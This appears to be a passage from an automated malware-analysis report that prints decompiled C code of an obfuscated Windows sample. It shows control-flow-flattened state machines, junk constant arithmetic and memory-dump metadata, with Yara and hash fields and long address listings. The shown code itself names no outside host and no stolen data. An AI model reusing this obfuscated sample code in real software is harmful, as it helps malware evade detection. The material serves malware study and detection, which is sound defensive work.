						if(_t461 == 0x2e332bc4) {
							E006D2674(_v252, _v136, _a4, _t441, _v144, _v224,  *_t468);
							_t470 = _t470 + 0x14;
							_t461 = 0x2452d659;
							L9:
							_t403 = _v268;
							goto L1;
						}
						if(_t461 == 0x2efa85f7) {
							_t377 = _a4 + 1;
							if((_t377 & 0x0000000f) != 0) {
								_t377 = (_t377 & 0xfffffff0) + 0x10;
							}
							 *((intOrPtr*)(_t401 + 4)) = _t377 + 0x74;
							_push(_t403);
							_push(_t403);
							_t460 = E006C8736( *((intOrPtr*)(_t401 + 4)));
							 *_t401 = _t460;
							if(_t460 == 0) {
								goto L33;
							} else {
								_t317 = _t460 + 0x74; // 0x74
								_t441 = _t317;
								_v116 = _a4;
								_t461 = 0x332cf2c2;
								_t403 = _v268;
								_v236 = _t317;
								_v120 =  *((intOrPtr*)(_t401 + 4)) - 0x74;
								continue;
							}
						}
						if(_t461 != 0x332cf2c2) {
							goto L29;
						}
						_t396 =  *0x6dca20; // 0x0
						_t397 = E006D1B49( &_v128, _v264, _t403,  *((intOrPtr*)(_t396 + 0x2c)), _t403, _v152, _v140);
						_t470 = _t470 + 0x14;
						asm("sbb esi, esi");
						_t461 = ( ~_t397 & 0x0493a058) + 0x299f8b6c;
						goto L9;
					}
					if(_t472 == 0) {
						if(_t403 == 0) {
							E006CF536(_v156, _v176, _v228,  *_t401);
						}
						goto L33;
					}
					if(_t461 == 0x405be48) {
						_t461 = 0x2efa85f7;
						goto L2;
					}
					if(_t461 == 0x8f3e942) {
						_push(_t403);
						_push(_t403);
						E006C5F43(_t403, _v128);
						_t461 = 0x299f8b6c;
						goto L9;
					}
					if(_t461 == 0x1e33600c) {
						_v112 = 0x6c;
						_t391 =  *0x6dca20; // 0x0
						_t392 = E006C8010( &_v108,  &_v112, _v188, _v240,  *((intOrPtr*)(_t391 + 0x24)),  *((intOrPtr*)(_t391 + 0x10)), _v256, _v204, _v180, _v172);
						_t470 = _t470 + 0x20;
						if(_t392 == 0) {
							_t461 = 0x8f3e942;
							goto L9;
						}
						_t416 =  &_v1;
						_t448 = _t460;
						do {
							 *_t448 =  *_t416;
							_t448 = _t448 + 1;
							_t416 = _t416 - 1;
						} while (_t416 >=  &_v96);
						_t461 = 0x2e2d51e6;
						goto L9;
					}
					if(_t461 != 0x2452d659) {
						goto L29;
					}
					_t393 =  *0x6dca20; // 0x0
					_t395 = E006D0A3B(_v120, _v128, _v148, _v232, _v160, _t403,  &_v116, _v212, _v196, _t441, _v200, _t403,  *((intOrPtr*)(_t393 + 0x10)));
					_t470 = _t470 + 0x2c;
					asm("sbb esi, esi");
					_t461 = ( ~_t395 & 0x153f76ca) + 0x8f3e942;
					goto L9;
				}
			}











































































                                          0x006cf993
                                          0x006cf99d
                                          0x006cf9a4
                                          0x006cf9a6
                                          0x006cf9ad
                                          0x006cf9b4
                                          0x006cf9b5
                                          0x006cf9b7
                                          0x006cf9bc
                                          0x006cf9c7
                                          0x006cf9ca
                                          0x006cf9d9
                                          0x006cf9db
                                          0x006cf9e0
                                          0x006cf9e6
                                          0x006cf9e9
                                          0x006cf9ed
                                          0x006cf9f5
                                          0x006cfa02
                                          0x006cfa06
                                          0x006cfa0e
                                          0x006cfa16
                                          0x006cfa1e
                                          0x006cfa23
                                          0x006cfa28
                                          0x006cfa30
                                          0x006cfa3b
                                          0x006cfa46
                                          0x006cfa51
                                          0x006cfa5f
                                          0x006cfa60
                                          0x006cfa66
                                          0x006cfa6e
                                          0x006cfa76
                                          0x006cfa81
                                          0x006cfa8c
                                          0x006cfa97
                                          0x006cfa9f
                                          0x006cfaa3
                                          0x006cfaab
                                          0x006cfab3
                                          0x006cfabb
                                          0x006cfacb
                                          0x006cfad5
                                          0x006cfada
                                          0x006cfade
                                          0x006cfae6
                                          0x006cfaee
                                          0x006cfaf6
                                          0x006cfafe
                                          0x006cfb06
                                          0x006cfb0e
                                          0x006cfb19
                                          0x006cfb24
                                          0x006cfb2f
                                          0x006cfb3a
                                          0x006cfb45
                                          0x006cfb52
                                          0x006cfb5e
                                          0x006cfb63
                                          0x006cfb69
                                          0x006cfb6e
                                          0x006cfb76
                                          0x006cfb7e
                                          0x006cfb89
                                          0x006cfb91
                                          0x006cfb9c
                                          0x006cfbaf
                                          0x006cfbb2
                                          0x006cfbb9
                                          0x006cfbc4
                                          0x006cfbcc
                                          0x006cfbdc
                                          0x006cfbe0
                                          0x006cfbe8
                                          0x006cfbf3
                                          0x006cfbfa
                                          0x006cfc05
                                          0x006cfc0d
                                          0x006cfc15
                                          0x006cfc1d
                                          0x006cfc25
                                          0x006cfc2d
                                          0x006cfc38
                                          0x006cfc43
                                          0x006cfc4e
                                          0x006cfc5a
                                          0x006cfc5f
                                          0x006cfc65
                                          0x006cfc6d
                                          0x006cfc75
                                          0x006cfc7d
                                          0x006cfc82
                                          0x006cfc8a
                                          0x006cfc92
                                          0x006cfc9a
                                          0x006cfca2
                                          0x006cfca7
                                          0x006cfcaf
                                          0x006cfcb7
                                          0x006cfcbc
                                          0x006cfcc1
                                          0x006cfcc9
                                          0x006cfcd1
                                          0x006cfcd9
                                          0x006cfce3
                                          0x006cfce4
                                          0x006cfce8
                                          0x006cfcf0
                                          0x006cfcf8
                                          0x006cfd06
                                          0x006cfd0a
                                          0x006cfd12
                                          0x006cfd1a
                                          0x006cfd22
                                          0x006cfd27
                                          0x006cfd2f
                                          0x006cfd37
                                          0x006cfd3f
                                          0x006cfd47
                                          0x006cfd4c
                                          0x006cfd54
                                          0x006cfd5c
                                          0x006cfd6c
                                          0x006cfd71
                                          0x006cfd77
                                          0x006cfd7f
                                          0x006cfd8b
                                          0x006cfd90
                                          0x006cfd96
                                          0x006cfd9e
                                          0x006cfda6
                                          0x006cfdae
                                          0x006cfdb6
                                          0x006cfdbe
                                          0x006cfdcb
                                          0x006cfdcc
                                          0x006cfdd0
                                          0x006cfdd5
                                          0x006cfddd
                                          0x006cfde5
                                          0x006cfded
                                          0x006cfdf2
                                          0x006cfdfa
                                          0x006cfe02
                                          0x006cfe0a
                                          0x006cfe12
                                          0x006cfe1a
                                          0x006cfe22
                                          0x006cfe2f
                                          0x006cfe39
                                          0x006cfe3d
                                          0x006cfe45
                                          0x006cfe4c
                                          0x006cfe4c
                                          0x006cfe4c
                                          0x006cfe50
                                          0x006cfe50
                                          0x006cfe50
                                          0x006cfe56
                                          0x00000000
                                          0x00000000
                                          0x006cff96
                                          0x006d009f
                                          0x006d00ca
                                          0x006d00cf
                                          0x006d00d3
                                          0x006d00d6
                                          0x006d00dc
                                          0x00000000
                                          0x00000000
                                          0x006d00e4
                                          0x006d00e9
                                          0x006d00ea
                                          0x006d00ee
                                          0x006d00f4
                                          0x006d0117
                                          0x006d0125
                                          0x006d0125
                                          0x006cfe4c
                                          0x006cfe4c
                                          0x006cfe4c
                                          0x00000000
                                          0x006cfe4c
                                          0x006cfe4c
                                          0x006cffa2
                                          0x006d0082
                                          0x006d0087
                                          0x006d008a
                                          0x006cfee7
                                          0x006cfee7
                                          0x00000000
                                          0x006cfee7
                                          0x006cffae
                                          0x006d0001
                                          0x006d0004
                                          0x006d0009
                                          0x006d0009
                                          0x006d000f
                                          0x006d0021
                                          0x006d0022
                                          0x006d002b
                                          0x006d002d
                                          0x006d0033
                                          0x00000000
                                          0x006d0039
                                          0x006d003c
                                          0x006d003c
                                          0x006d0045
                                          0x006d004c
                                          0x006d0051
                                          0x006d0055
                                          0x006d0059
                                          0x00000000
                                          0x006d0059
                                          0x006d0033
                                          0x006cffb6
                                          0x00000000
                                          0x00000000
                                          0x006cffca
                                          0x006cffdf
                                          0x006cffe4
                                          0x006cffeb
                                          0x006cfff3
                                          0x00000000
                                          0x006cfff3
                                          0x006cfe5c
                                          0x006d00fd
                                          0x006d0110
                                          0x006d0116
                                          0x00000000
                                          0x006d00fd
                                          0x006cfe68
                                          0x006cff86
                                          0x00000000
                                          0x006cff86
                                          0x006cfe74
                                          0x006cff73
                                          0x006cff74
                                          0x006cff75
                                          0x006cff7c
                                          0x00000000
                                          0x006cff7c
                                          0x006cfe80
                                          0x006cfef4
                                          0x006cff19
                                          0x006cff2c
                                          0x006cff31
                                          0x006cff36
                                          0x006cff59
                                          0x00000000
                                          0x006cff59
                                          0x006cff38
                                          0x006cff3f
                                          0x006cff41
                                          0x006cff43
                                          0x006cff45
                                          0x006cff46
                                          0x006cff4e
                                          0x006cff52
                                          0x00000000
                                          0x006cff52
                                          0x006cfe88
                                          0x00000000
                                          0x00000000
                                          0x006cfe8e
                                          0x006cfecd
                                          0x006cfed2
                                          0x006cfed9
                                          0x006cfee1
                                          0x00000000
                                          0x006cfee1

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: -;$>$K$PL$Q,L$Zb$[+$^)$l$s|${n$%$)$Q-.$Q-.$SeK
                                          • API String ID: 0-11970308
                                          • Opcode ID: e9b7fb1abc6f125693260c91bf994f9717df2631f1dcd2562bf35fd201769980
                                          • Instruction ID: df8323c28655483716540778b1e94a8d26cf62d0ad8b122a42bc0ff51cb8d402
                                          • Opcode Fuzzy Hash: e9b7fb1abc6f125693260c91bf994f9717df2631f1dcd2562bf35fd201769980
                                          • Instruction Fuzzy Hash: 981225725083809FE364CF25C889A9BFBF2FBC5314F148A1DF69986260D7B59949CF42
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006C1CFA, Relevance: 19.3, Strings: 15, Instructions: 503COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 95%
                                          			E006C1CFA(void* __edx, intOrPtr* _a4) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				unsigned int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				unsigned int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				void* __ecx;
				void* _t496;
				void* _t539;
				intOrPtr _t544;
				intOrPtr _t546;
				signed int _t548;
				signed int _t551;
				intOrPtr _t552;
				intOrPtr _t554;
				signed int _t555;
				intOrPtr _t562;
				intOrPtr _t572;
				void* _t574;
				signed int _t577;
				signed int _t578;
				signed int _t579;
				signed int _t580;
				signed int _t581;
				signed int _t582;
				signed int _t583;
				signed int _t584;
				signed int _t585;
				signed int _t586;
				signed int _t587;
				signed int _t588;
				signed int _t589;
				signed int _t590;
				intOrPtr _t591;
				intOrPtr _t592;
				void* _t597;
				intOrPtr _t599;
				intOrPtr _t635;
				intOrPtr _t639;
				void* _t641;
				signed int* _t653;
				void* _t656;

				_t575 = _a4;
				_push(_a4);
				_push(__edx);
				E006C602B(_t496);
				_v12 = 0x36bdff;
				_t653 =  &(( &_v228)[3]);
				_v8 = 0x3ff2a1;
				_t639 = 0;
				_v4 = 0;
				_v132 = 0xebdb;
				_t641 = 0x15e50797;
				_t577 = 0x54;
				_v132 = _v132 / _t577;
				_v132 = _v132 | 0x22f60655;
				_v132 = _v132 ^ 0x22f660d1;
				_v120 = 0xef02;
				_v120 = _v120 + 0xffff4354;
				_v120 = _v120 + 0xfbd6;
				_v120 = _v120 ^ 0x0001ae28;
				_v52 = 0x7417;
				_v52 = _v52 + 0x1179;
				_v52 = _v52 ^ 0x00000590;
				_v48 = 0x8f30;
				_v48 = _v48 >> 0xf;
				_v64 = 0xc7cd;
				_v64 = _v64 << 0xc;
				_v64 = _v64 ^ 0x0c7cd040;
				_v140 = 0xc967;
				_v140 = _v140 << 0xb;
				_v140 = _v140 | 0xe06bf9c9;
				_v140 = _v140 ^ 0x166bf9c9;
				_v196 = 0x461e;
				_v196 = _v196 | 0x6b692bd6;
				_v196 = _v196 + 0xc0cf;
				_v196 = _v196 + 0xffff0de4;
				_v196 = _v196 ^ 0x6b6977c5;
				_v180 = 0xfff7;
				_t578 = 0x59;
				_v180 = _v180 / _t578;
				_t579 = 0x4d;
				_v180 = _v180 * 0x18;
				_v180 = _v180 | 0x58a6a9da;
				_v180 = _v180 ^ 0x58a6c249;
				_v128 = 0x9f16;
				_v128 = _v128 ^ 0xdade8ffa;
				_v128 = _v128 ^ 0x4c90ffe3;
				_v128 = _v128 ^ 0x964ece00;
				_v92 = 0xcecd;
				_v92 = _v92 + 0x8237;
				_v92 = _v92 / _t579;
				_v92 = _v92 ^ 0x00006f99;
				_v100 = 0x1088;
				_v100 = _v100 << 8;
				_v100 = _v100 << 3;
				_v100 = _v100 ^ 0x0084674e;
				_v108 = 0x5533;
				_v108 = _v108 >> 9;
				_v108 = _v108 | 0xd8fb4233;
				_v108 = _v108 ^ 0xd8fb1bcd;
				_v208 = 0xcae;
				_v208 = _v208 / _t579;
				_t580 = 0x13;
				_v208 = _v208 / _t580;
				_v208 = _v208 >> 0xa;
				_v208 = _v208 ^ 0x00001a16;
				_v216 = 0x40e3;
				_v216 = _v216 | 0x810267c5;
				_v216 = _v216 << 1;
				_v216 = _v216 << 3;
				_v216 = _v216 ^ 0x10267eee;
				_v28 = 0xb673;
				_t581 = 0x3e;
				_v28 = _v28 / _t581;
				_v28 = _v28 ^ 0x0000683f;
				_v40 = 0x9279;
				_v40 = _v40 + 0xffffeab6;
				_v40 = _v40 ^ 0x000054a5;
				_v204 = 0x1c40;
				_v204 = _v204 + 0xffff1f7d;
				_t582 = 0x50;
				_v204 = _v204 / _t582;
				_v204 = _v204 ^ 0x72bb6b9a;
				_v204 = _v204 ^ 0x71887e03;
				_v112 = 0xb897;
				_v112 = _v112 + 0xffffdcba;
				_v112 = _v112 | 0x14aad9bd;
				_v112 = _v112 ^ 0x14aaad8a;
				_v172 = 0xd85f;
				_v172 = _v172 + 0xffff9181;
				_t583 = 0x36;
				_v172 = _v172 * 0x2e;
				_v172 = _v172 + 0x3c74;
				_v172 = _v172 ^ 0x00135ecd;
				_v212 = 0x19f7;
				_v212 = _v212 + 0xffff95e1;
				_v212 = _v212 | 0x04fc32b0;
				_v212 = _v212 << 0xa;
				_v212 = _v212 ^ 0xfeffe01a;
				_v36 = 0x7d37;
				_v36 = _v36 | 0x20ef5b1a;
				_v36 = _v36 ^ 0x20ef0402;
				_v116 = 0xd595;
				_v116 = _v116 / _t583;
				_v116 = _v116 + 0xffffe49c;
				_v116 = _v116 ^ 0xffffa94a;
				_v160 = 0x5e14;
				_v160 = _v160 | 0xdf0c29a2;
				_v160 = _v160 ^ 0xe579e09e;
				_v160 = _v160 + 0xffffde5a;
				_v160 = _v160 ^ 0x3a753154;
				_v68 = 0x52ff;
				_v68 = _v68 >> 8;
				_v68 = _v68 ^ 0x000014f4;
				_v76 = 0x7879;
				_t584 = 0x73;
				_v76 = _v76 / _t584;
				_v76 = _v76 ^ 0x0000054d;
				_v72 = 0x594e;
				_v72 = _v72 ^ 0x61e5003d;
				_v72 = _v72 ^ 0x61e57443;
				_v156 = 0xdc41;
				_v156 = _v156 << 6;
				_v156 = _v156 << 0x10;
				_v156 = _v156 ^ 0x10402e5f;
				_v152 = 0x2cab;
				_v152 = _v152 << 0xc;
				_v152 = _v152 ^ 0xa6d63634;
				_v152 = _v152 ^ 0xa41cdbd3;
				_v24 = 0xfca2;
				_v24 = _v24 >> 0xd;
				_v24 = _v24 ^ 0x000010c7;
				_v96 = 0xe6c1;
				_v96 = _v96 << 0xd;
				_v96 = _v96 + 0xc19f;
				_v96 = _v96 ^ 0x1cd8953a;
				_v224 = 0x49a1;
				_v224 = _v224 ^ 0xfe0521c0;
				_v224 = _v224 + 0x1e0d;
				_v224 = _v224 | 0x46707e16;
				_v224 = _v224 ^ 0xfe759897;
				_v228 = 0x2882;
				_v228 = _v228 << 0x10;
				_v228 = _v228 ^ 0x2e28bbbf;
				_v228 = _v228 | 0x3bec92e5;
				_v228 = _v228 ^ 0x3fee891d;
				_v136 = 0x5ad;
				_v136 = _v136 ^ 0x3d33a635;
				_v136 = _v136 + 0xffff9ac4;
				_v136 = _v136 ^ 0x3d335448;
				_v104 = 0x3c69;
				_v104 = _v104 + 0xf144;
				_t585 = 0x19;
				_v104 = _v104 * 0x1e;
				_v104 = _v104 ^ 0x0023546a;
				_v188 = 0xf300;
				_v188 = _v188 / _t585;
				_v188 = _v188 + 0xffffad26;
				_v188 = _v188 | 0x8105dcb8;
				_v188 = _v188 ^ 0xffffe238;
				_v144 = 0x45c8;
				_v144 = _v144 >> 0xe;
				_v144 = _v144 + 0x45b6;
				_v144 = _v144 ^ 0x000072cd;
				_v192 = 0xd236;
				_v192 = _v192 >> 0x10;
				_t586 = 0x69;
				_v192 = _v192 / _t586;
				_v192 = _v192 ^ 0x176600d6;
				_v192 = _v192 ^ 0x17663ad7;
				_v200 = 0x1b90;
				_v200 = _v200 >> 0xe;
				_v200 = _v200 | 0x00032953;
				_t587 = 0xe;
				_v200 = _v200 * 0x71;
				_v200 = _v200 ^ 0x016540c6;
				_v32 = 0xa5b;
				_v32 = _v32 / _t587;
				_v32 = _v32 ^ 0x00002bda;
				_v56 = 0xbe4e;
				_v56 = _v56 + 0xffffe059;
				_v56 = _v56 ^ 0x0000eaa3;
				_v220 = 0x4321;
				_v220 = _v220 ^ 0x3fa1daa1;
				_v220 = _v220 + 0xffff309f;
				_t588 = 0x24;
				_v220 = _v220 / _t588;
				_v220 = _v220 ^ 0x01c46047;
				_v164 = 0x3944;
				_v164 = _v164 + 0xffff1fd9;
				_t589 = 0x2b;
				_v164 = _v164 * 0x57;
				_v164 = _v164 << 4;
				_v164 = _v164 ^ 0xfc749d64;
				_v148 = 0x7755;
				_v148 = _v148 ^ 0x244775ea;
				_v148 = _v148 | 0xcd3e82a6;
				_v148 = _v148 ^ 0xed7f8152;
				_v88 = 0x40ad;
				_v88 = _v88 >> 0xf;
				_v88 = _v88 ^ 0x000030bd;
				_v80 = 0x9327;
				_v80 = _v80 * 0x70;
				_v80 = _v80 ^ 0x00406c8d;
				_v176 = 0x8ba8;
				_v176 = _v176 + 0x5748;
				_v176 = _v176 + 0xffffe08a;
				_v176 = _v176 + 0xffffcf91;
				_v176 = _v176 ^ 0x0000bf1e;
				_v124 = 0xe985;
				_v124 = _v124 ^ 0x9cf6d459;
				_v124 = _v124 + 0xffffb832;
				_v124 = _v124 ^ 0x9cf5d440;
				_v184 = 0xee13;
				_v184 = _v184 / _t589;
				_v184 = _v184 ^ 0x973ecc13;
				_t590 = 0x6a;
				_v184 = _v184 / _t590;
				_v184 = _v184 ^ 0x016d24ef;
				_v84 = 0xbcf1;
				_v84 = _v84 ^ 0x64b03ea8;
				_v84 = _v84 ^ 0x64b0e2a8;
				_v60 = 0x8a4f;
				_v60 = _v60 | 0x8c15d5a4;
				_v60 = _v60 ^ 0x8c14dfef;
				_v44 = 0x30ef;
				_v44 = _v44 + 0xffffe2a4;
				_v44 = _v44 ^ 0x00001380;
				_v168 = 0xbe5e;
				_v168 = _v168 << 0x10;
				_v168 = _v168 | 0x5aa68a8d;
				_v168 = _v168 + 0xffff34cf;
				_v168 = _v168 ^ 0xfefdbf5d;
				goto L1;
				do {
					while(1) {
						L1:
						_t656 = _t641 - 0x2e2ba50c;
						if(_t656 > 0) {
							break;
						}
						if(_t656 == 0) {
							_push(_t590);
							_push(_t590);
							_t591 =  *0x6dca20; // 0x0
							_t590 = _t591 + 0x18;
							_t551 = E006CC46E(_t590, _v208, _v216, _v28, _v140 | _v64, _t590, _v40);
							_t653 =  &(_t653[7]);
							asm("sbb esi, esi");
							_t641 = ( ~_t551 & 0xf61d5154) + 0x3b32afa9;
							continue;
						} else {
							if(_t641 == 0xfdb1f24) {
								_t552 =  *0x6dca20; // 0x0
								_t554 =  *0x6dca20; // 0x0
								_t555 = E006CF292(_v72, _v156,  *((intOrPtr*)(_t554 + 0x18)), _v152, _v20, _v24, _t590, _v16, _t552 + 0x24, _t590, _v96);
								_t590 = _v224;
								asm("sbb esi, esi");
								_t641 = ( ~_t555 & 0x1a4c73ed) + 0x1af0d9d8;
								E006D9465(_t590, _v20, _v228);
								_t653 =  &(_t653[0xa]);
								goto L27;
							} else {
								if(_t641 == 0x15e50797) {
									_push(_t590);
									_t597 = 0x34;
									_t562 = E006C8736(_t597);
									 *0x6dca20 = _t562;
									_t590 = _t590;
									if(_t562 != 0) {
										_t641 = 0x2e2ba50c;
										continue;
									}
								} else {
									if(_t641 == 0x1af0d9d8) {
										_t599 =  *0x6dca20; // 0x0
										_t590 =  *(_t599 + 0x18);
										E006C87FA(_t590);
										_t653 = _t653 - 0x10 + 0x10;
										_t641 = 0x3b32afa9;
										continue;
									} else {
										if(_t641 == 0x1f84fef1) {
											_t572 =  *0x6dca20; // 0x0
											_push(_t590);
											_push(_t590);
											E006DAB25(_t590,  *((intOrPtr*)(_t572 + 0x24)));
											_t653 =  &(_t653[3]);
											_t641 = 0x1af0d9d8;
											continue;
										} else {
											if(_t641 != 0x2135b5bc) {
												goto L27;
											} else {
												_t635 =  *0x6dca20; // 0x0
												_t437 = _t635 + 0x2c; // 0x2c
												_t590 = _t437;
												_t574 = E006D1A1F(_t590,  *((intOrPtr*)(_t635 + 0x18)), _v220, _v120, _v164, _v148, _t590, _v88, _t590, _v80);
												_t653 =  &(_t653[8]);
												if(_t574 != 0) {
													_t639 = 1;
												} else {
													_t641 = 0x3151f296;
													continue;
												}
											}
										}
									}
								}
							}
						}
						L21:
						return _t639;
					}
					if(_t641 == 0x315000fd) {
						_t590 = _v36;
						_t539 = E006C75AE(_t590,  *_t575, _t590,  &_v20, _v44, _v116,  *((intOrPtr*)(_t575 + 4)),  &_v16, _v160, _v52, _v168 | _v60, _v68, _v76);
						_t653 =  &(_t653[0xb]);
						if(_t539 == 0) {
							_t641 = 0x1af0d9d8;
							goto L27;
						} else {
							_t641 = 0xfdb1f24;
							goto L1;
						}
					} else {
						if(_t641 == 0x3151f296) {
							_t544 =  *0x6dca20; // 0x0
							_push(_t590);
							_push(_t590);
							E006DAB25(_t590,  *((intOrPtr*)(_t544 + 0x10)));
							_t653 =  &(_t653[3]);
							_t641 = 0x1f84fef1;
							goto L1;
						} else {
							if(_t641 == 0x353d4dc5) {
								_t546 =  *0x6dca20; // 0x0
								_t592 =  *0x6dca20; // 0x0
								_t590 =  *(_t592 + 0x18);
								_t548 = E006C66C9(_t590, _v48, _v132, _t546 + 0x10, _v192, _v200, _v32, _v56);
								_t653 =  &(_t653[6]);
								asm("sbb esi, esi");
								_t641 = ( ~_t548 & 0x01b0b6cb) + 0x1f84fef1;
								goto L1;
							} else {
								if(_t641 != 0x3b32afa9) {
									goto L27;
								} else {
									E006CF536(_v92, _v100, _v108,  *0x6dca20);
								}
							}
						}
					}
					goto L21;
					L27:
				} while (_t641 != 0x5edb69a);
				goto L21;
			}
































































































                                          0x006c1d01
                                          0x006c1d0b
                                          0x006c1d0c
                                          0x006c1d0e
                                          0x006c1d13
                                          0x006c1d1e
                                          0x006c1d21
                                          0x006c1d2c
                                          0x006c1d2e
                                          0x006c1d37
                                          0x006c1d3f
                                          0x006c1d4a
                                          0x006c1d4f
                                          0x006c1d55
                                          0x006c1d5d
                                          0x006c1d65
                                          0x006c1d70
                                          0x006c1d7b
                                          0x006c1d86
                                          0x006c1d91
                                          0x006c1d9c
                                          0x006c1da7
                                          0x006c1db2
                                          0x006c1dbd
                                          0x006c1dd3
                                          0x006c1dde
                                          0x006c1de6
                                          0x006c1df1
                                          0x006c1df9
                                          0x006c1dfe
                                          0x006c1e06
                                          0x006c1e0e
                                          0x006c1e16
                                          0x006c1e1e
                                          0x006c1e26
                                          0x006c1e2e
                                          0x006c1e36
                                          0x006c1e42
                                          0x006c1e47
                                          0x006c1e52
                                          0x006c1e53
                                          0x006c1e57
                                          0x006c1e5f
                                          0x006c1e67
                                          0x006c1e6f
                                          0x006c1e77
                                          0x006c1e7f
                                          0x006c1e87
                                          0x006c1e92
                                          0x006c1ea6
                                          0x006c1ead
                                          0x006c1eb8
                                          0x006c1ec3
                                          0x006c1ecb
                                          0x006c1ed3
                                          0x006c1ede
                                          0x006c1ee9
                                          0x006c1ef1
                                          0x006c1efc
                                          0x006c1f07
                                          0x006c1f19
                                          0x006c1f23
                                          0x006c1f28
                                          0x006c1f2e
                                          0x006c1f33
                                          0x006c1f3b
                                          0x006c1f43
                                          0x006c1f4b
                                          0x006c1f4f
                                          0x006c1f54
                                          0x006c1f5c
                                          0x006c1f6e
                                          0x006c1f73
                                          0x006c1f7c
                                          0x006c1f87
                                          0x006c1f92
                                          0x006c1f9d
                                          0x006c1fa8
                                          0x006c1fb0
                                          0x006c1fbc
                                          0x006c1fc1
                                          0x006c1fc7
                                          0x006c1fcf
                                          0x006c1fd7
                                          0x006c1fe2
                                          0x006c1fed
                                          0x006c1ff8
                                          0x006c2003
                                          0x006c200b
                                          0x006c2018
                                          0x006c201b
                                          0x006c201f
                                          0x006c2027
                                          0x006c202f
                                          0x006c2037
                                          0x006c203f
                                          0x006c2047
                                          0x006c204c
                                          0x006c2054
                                          0x006c205f
                                          0x006c206a
                                          0x006c2075
                                          0x006c208b
                                          0x006c2092
                                          0x006c209d
                                          0x006c20a8
                                          0x006c20b0
                                          0x006c20b8
                                          0x006c20c0
                                          0x006c20c8
                                          0x006c20d0
                                          0x006c20db
                                          0x006c20e3
                                          0x006c20ee
                                          0x006c2100
                                          0x006c2103
                                          0x006c210a
                                          0x006c2115
                                          0x006c2120
                                          0x006c212d
                                          0x006c2138
                                          0x006c2140
                                          0x006c2145
                                          0x006c214a
                                          0x006c2152
                                          0x006c215a
                                          0x006c215f
                                          0x006c2167
                                          0x006c216f
                                          0x006c217a
                                          0x006c2182
                                          0x006c218d
                                          0x006c2198
                                          0x006c21a0
                                          0x006c21ab
                                          0x006c21b6
                                          0x006c21be
                                          0x006c21c6
                                          0x006c21ce
                                          0x006c21d6
                                          0x006c21de
                                          0x006c21e6
                                          0x006c21eb
                                          0x006c21f3
                                          0x006c21fb
                                          0x006c2203
                                          0x006c220b
                                          0x006c2213
                                          0x006c221b
                                          0x006c2223
                                          0x006c222e
                                          0x006c2243
                                          0x006c2246
                                          0x006c224d
                                          0x006c2258
                                          0x006c2268
                                          0x006c226c
                                          0x006c2274
                                          0x006c227c
                                          0x006c2284
                                          0x006c228c
                                          0x006c2291
                                          0x006c2299
                                          0x006c22a1
                                          0x006c22a9
                                          0x006c22b2
                                          0x006c22b7
                                          0x006c22bd
                                          0x006c22c5
                                          0x006c22cd
                                          0x006c22d5
                                          0x006c22da
                                          0x006c22e7
                                          0x006c22e8
                                          0x006c22ec
                                          0x006c22f4
                                          0x006c2308
                                          0x006c230f
                                          0x006c231a
                                          0x006c2325
                                          0x006c2330
                                          0x006c233b
                                          0x006c2343
                                          0x006c234b
                                          0x006c2360
                                          0x006c2365
                                          0x006c236b
                                          0x006c2373
                                          0x006c237b
                                          0x006c2388
                                          0x006c238b
                                          0x006c238f
                                          0x006c2394
                                          0x006c239c
                                          0x006c23a4
                                          0x006c23ac
                                          0x006c23b4
                                          0x006c23bc
                                          0x006c23c7
                                          0x006c23cf
                                          0x006c23da
                                          0x006c23ed
                                          0x006c23f4
                                          0x006c23ff
                                          0x006c2407
                                          0x006c240f
                                          0x006c2417
                                          0x006c241f
                                          0x006c2427
                                          0x006c242f
                                          0x006c2437
                                          0x006c243f
                                          0x006c2447
                                          0x006c2457
                                          0x006c245b
                                          0x006c2467
                                          0x006c246a
                                          0x006c246e
                                          0x006c2476
                                          0x006c2481
                                          0x006c248c
                                          0x006c2497
                                          0x006c24a2
                                          0x006c24ad
                                          0x006c24b8
                                          0x006c24c3
                                          0x006c24ce
                                          0x006c24d9
                                          0x006c24e1
                                          0x006c24e6
                                          0x006c24ee
                                          0x006c24f6
                                          0x006c24f6
                                          0x006c24fe
                                          0x006c24fe
                                          0x006c24fe
                                          0x006c24fe
                                          0x006c2504
                                          0x00000000
                                          0x00000000
                                          0x006c250a
                                          0x006c2686
                                          0x006c2687
                                          0x006c26a7
                                          0x006c26b1
                                          0x006c26b4
                                          0x006c26b9
                                          0x006c26c0
                                          0x006c26c8
                                          0x00000000
                                          0x006c2510
                                          0x006c2516
                                          0x006c2620
                                          0x006c2644
                                          0x006c2657
                                          0x006c2669
                                          0x006c266f
                                          0x006c2677
                                          0x006c2679
                                          0x006c267e
                                          0x00000000
                                          0x006c251c
                                          0x006c2522
                                          0x006c25f6
                                          0x006c25fa
                                          0x006c25fb
                                          0x006c2600
                                          0x006c2606
                                          0x006c2609
                                          0x006c260f
                                          0x00000000
                                          0x006c260f
                                          0x006c2528
                                          0x006c252a
                                          0x006c25cf
                                          0x006c25d5
                                          0x006c25d8
                                          0x006c25dd
                                          0x006c25e0
                                          0x00000000
                                          0x006c2530
                                          0x006c2536
                                          0x006c25a0
                                          0x006c25a5
                                          0x006c25a6
